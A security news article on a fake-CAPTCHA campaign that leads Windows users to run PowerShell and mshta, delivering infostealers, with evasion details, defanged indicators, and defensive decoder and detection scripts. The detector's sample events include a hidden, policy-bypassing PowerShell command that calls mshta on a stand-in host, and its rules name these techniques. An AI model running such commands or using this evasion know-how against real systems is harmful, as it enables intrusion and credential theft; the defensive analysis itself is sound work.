Cyber Security News

Fake CAPTCHA Malware Exploits Windows Users to Run PowerShell Commands

In early February 2025, Trustwave SpiderLabs uncovered a resurgence of a malicious campaign leveraging fake CAPTCHA verifications to deliver malware.

This campaign uses deceptive CAPTCHA prompts to trick users into executing PowerShell commands, initiating a multi-stage attack chain.

The end goal is to deploy infostealer malware such as Lumma and Vidar, which exfiltrate sensitive data and maintain persistence on infected systems.

The attack begins when a user encounters a fake CAPTCHA on a compromised website. Instead of verifying that the visitor is human, the fake CAPTCHA instructs the user to run a PowerShell command.

This script invokes additional malicious payloads through a series of steps, including downloading and decrypting further scripts, eventually leading to the deployment of infostealers.

Technical Breakdown of the Attack Chain

The attack chain comprises several stages. It opens with a deceptive fake CAPTCHA prompt that tricks users into executing a malicious PowerShell command, presented as a legitimate part of the verification process.

This command leverages mshta to retrieve and execute a remote HTA file, which in turn launches another PowerShell script.

Malicious PowerShell Execution Command.

The script then decrypts additional commands, enabling a multi-stage execution process.

Ultimately, this leads to the deployment of infostealer malware, such as Lumma and Vidar, designed to extract credentials and other sensitive data from the victim’s system.

Step-by-Step Execution.

The payloads are designed to bypass detection through obfuscation techniques, including large file sizes to evade sandbox analysis.

The decryption process involves multiple layers of Base64 decoding and XOR operations, dynamically retrieving malicious URLs and executing staged scripts.

Multi-Stage PowerShell Decryption

This attack uses layered PowerShell execution to evade detection and deploy malware. The decrypted PowerShell command contains a Base64-encoded payload, which, when decoded, reveals another script responsible for executing additional commands or downloading further payloads.

Multi-Stage PowerShell Decryption.

A key technique involves leveraging the .NET Marshal class to decrypt SecureString data, allowing sensitive operations to remain undetected.

The script then bypasses execution policies and fetches a malicious URL using Net.WebClient, downloading and running the payload while obfuscating command names to evade security tools.

The staged PowerShell script is hosted on different servers per campaign, such as https://60d427489[.]kliplubuziy[.]shop/e290ec7eeb84ea465f4d2e1441fec32d[.]stage. The attackers use large script files to bypass security analysis restrictions.

Decryption relies on an XOR key, stored in a variable ($GZluzrkhPzWWrrywFFx), which is converted to a byte array and applied to the Base64-decoded payload. The final script is then executed.

Notably, the XOR key in some campaigns resolves to AMSI_RESULT_NOT_DETECTED, enabling the malware to bypass AMSI protections. Variants of the attack also use the key in decimal form to further evade detection.
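The decoding sequence described above (Base64 decode, then XOR with a key held as either a string or its decimal byte values, then a further Base64 layer inside the recovered script) is the kind of routine an analyst reproduces when triaging one of these stages offline. The following Python is an added example written for this article; it is not Trustwave's tooling and not the campaign's code. The sample blob is constructed inside the block from a harmless placeholder script, and the key variable name and layer layout are assumptions for illustration.

```python
import base64
import re

# Key as the article reports it for some campaigns, and the decimal form that
# some variants use instead; both forms are accepted by key_to_bytes().
XOR_KEY_STRING = "AMSI_RESULT_NOT_DETECTED"
XOR_KEY_DECIMAL = ",".join(str(ord(c)) for c in XOR_KEY_STRING)  # "65,77,83,..."

# Matches the embedded blob that a decrypted layer hands to FromBase64String().
EMBEDDED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def key_to_bytes(key):
    """Normalise the key the way the script's byte-array conversion would:
    a plain string becomes its UTF-8 bytes; a comma- or space-separated run of
    decimal values (the decimal-form variant) becomes those byte values."""
    if isinstance(key, (bytes, bytearray)):
        return bytes(key)
    tokens = key.replace(",", " ").split()
    if tokens and all(tok.isdigit() for tok in tokens):
        return bytes(int(tok) & 0xFF for tok in tokens)
    return key.encode("utf-8")


def xor_with_key(data, key):
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    kb = key_to_bytes(key)
    if not kb:
        raise ValueError("empty XOR key")
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(data))


def decode_stage(b64_blob, key):
    """Base64-decode the payload, then apply the XOR key: yields the staged script."""
    return xor_with_key(base64.b64decode(b64_blob), key).decode("utf-8", "replace")


def unwrap_layers(b64_blob, key, max_layers=8):
    """Peel the XOR layer, then keep decoding any FromBase64String('...') blob
    the recovered script carries. Returns every layer, outermost first."""
    layers = [decode_stage(b64_blob, key)]
    while len(layers) < max_layers:
        m = EMBEDDED_B64.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
    return layers


def encode_stage(plaintext, key):
    """Inverse of decode_stage; used here only to build the constructed sample."""
    return base64.b64encode(xor_with_key(plaintext.encode("utf-8"), key)).decode("ascii")


# Constructed sample (not the campaign's payload): a harmless inner placeholder,
# wrapped in an outer layer that Base64-decodes it, then XOR-encrypted and
# Base64-encoded in the order the article describes.
INNER_STAGE = "Write-Output 'constructed inner stage'"
OUTER_STAGE = ("$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
               + base64.b64encode(INNER_STAGE.encode()).decode() + "'))")
SAMPLE_BLOB = encode_stage(OUTER_STAGE, XOR_KEY_STRING)

if __name__ == "__main__":
    # The decimal-form key recovers exactly the same layers as the string form.
    for i, layer in enumerate(unwrap_layers(SAMPLE_BLOB, XOR_KEY_DECIMAL)):
        print(f"layer {i}: {layer}")
```

Because XOR is its own inverse, a wrong key does not fail loudly; it simply produces garbage, so a triage script should check that the recovered layer parses as text (or contains expected tokens) before trusting the result.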

Final Payload and Defense Evasion Tactics

The final stage of the attack delivers Lumma Stealer and Vidar Stealer, which extract sensitive data from infected systems.

Additionally, the campaign deploys a Golang-based backdoor called HijackLoader through a malicious software package disguised as “TiVo Desktop.”

This package, approximately 700MB in size, likely aims to evade antivirus detection by inflating its size.

Trustwave’s investigation also revealed that these campaigns use unique staging sites for each iteration of the attack.

The attackers employ advanced defense evasion tactics such as disabling event logging, renaming system utilities, and hiding execution windows.
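The behaviours named in this article (mshta fetching a remote HTA, execution-policy bypass, Net.WebClient downloads, Marshal-based SecureString decryption, Base64 plus XOR decoding, and hidden execution windows) are each visible in PowerShell script-block logging. The Python below is an added example, not Trustwave's detection content, that scores such log text with simple weighted heuristics. The sample events, the rule weights and the alert threshold are constructed for illustration; tune them to your own baseline of legitimate administrative scripts.

```python
import re

# Weighted heuristics for the behaviours the article describes. Weights and the
# threshold are assumptions for this example; an entry with several patterns
# requires all of them to match (e.g. Base64 decode combined with -bxor).
RULES = {
    "mshta_remote_hta":        (3, [r"\bmshta(\.exe)?\b[^\n]*?https?://"]),
    "execution_policy_bypass": (2, [r"-(ep|exec|executionpolicy)\s+bypass"]),
    "securestring_decrypt":    (2, [r"marshal\]::(securestringtobstr|ptrtostring(auto|bstr|uni))"]),
    "base64_then_xor":         (2, [r"frombase64string", r"-bxor"]),
    "webclient_download":      (1, [r"net\.webclient"]),
    "hidden_window":           (1, [r"-(w|windowstyle)\s+hidden"]),
}
ALERT_THRESHOLD = 4


def score_script(text):
    """Return (score, [matched rule names]) for one script-block text."""
    score, hits = 0, []
    for name, (weight, patterns) in RULES.items():
        if all(re.search(p, text, re.IGNORECASE) for p in patterns):
            score += weight
            hits.append(name)
    return score, hits


def triage(events):
    """Events are dicts with 'id' and 'script' (e.g. the ScriptBlockText of a
    Windows Event ID 4104 record). Returns alerts at or above the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_script(ev["script"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "score": score, "rules": hits})
    return alerts


# Constructed sample log text (not real telemetry). Hosts use the reserved
# .invalid TLD; excerpts are shortened with "..." as an analyst might see them.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"id": 2, "script": "$wc = New-Object Net.WebClient; "
                        "$wc.DownloadFile('https://intranet.example.invalid/tool.zip', 'C:\\tmp\\tool.zip')"},
    # Stage 1 as the article describes it: hidden window, policy bypass, mshta to a remote HTA.
    {"id": 3, "script": "powershell -w hidden -ep bypass -c \"mshta https://staging.example.invalid/verify.hta\""},
    # Stage 2 excerpt: XOR key string, Base64 decode, -bxor loop, SecureString decryption.
    {"id": 4, "script": "$k=[Text.Encoding]::UTF8.GetBytes('AMSI_RESULT_NOT_DETECTED'); "
                        "$d=[Convert]::FromBase64String($b); ... $d[$i] -bxor $k[$i % $k.Length] ...; "
                        "[Runtime.InteropServices.Marshal]::PtrToStringAuto("
                        "[Runtime.InteropServices.Marshal]::SecureStringToBSTR($s))"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Event 2 shows why a single indicator should not alert on its own: Net.WebClient is common in legitimate admin scripts and only scores 1, whereas the stage-1 and stage-2 excerpts cross the threshold because several of the article's behaviours co-occur in one script block.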

Trustwave continues to monitor this evolving threat through its Advanced Continual Threat Hunt (ACTH) methodology.

Organizations are advised to remain vigilant against deceptive CAPTCHA prompts and implement robust security measures to detect and mitigate such sophisticated attacks.

IOC (Indicators of Compromise)

Category            Indicator
File hash (MD5)     Lumma Stealer: 322579b54e4c6fecabeee9cdb75233d8
File hash (MD5)     Lumma Stealer: d67ee7ae28a09bf7f6d33118a9d07527
File hash (MD5)     Vidar Stealer: 17190c7e5163b5c115e3d470f568ee5f
File hash (MD5)     HijackLoader: 218261DAA1AEBD5484B29BF7F959B57A
IP address          188[.]114[.]97[.]3
IP address          185[.]195[.]97[.]57
IP address          191[.]101[.]230[.]18
IP address          172[.]67[.]149[.]66
URL                 hxxps[://]t[.]me/m08mbk
URL                 hxxps[://]wirybringero[.]shop/api
URL                 hxxps[://]farmagrupodw[.]com/temp/Elated[.]exe
URL                 hxxps[://]www[.]suarakutim[.]com/temp/wspconfig[.]rpm
URL                 hxxps[://]www[.]suarakutim[.]com/temp/hosebird[.]rpm
URL                 hxxps[://]steamcommunity[.]com/profiles/76561199724331900
URL                 hxxps[://]steamcommunity[.]com/profiles/76561199820567237
Domain              cryptocurrencytrends[.]click
Domain              guardeduppe[.]com
Domain              toppyneedus[.]biz


Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.
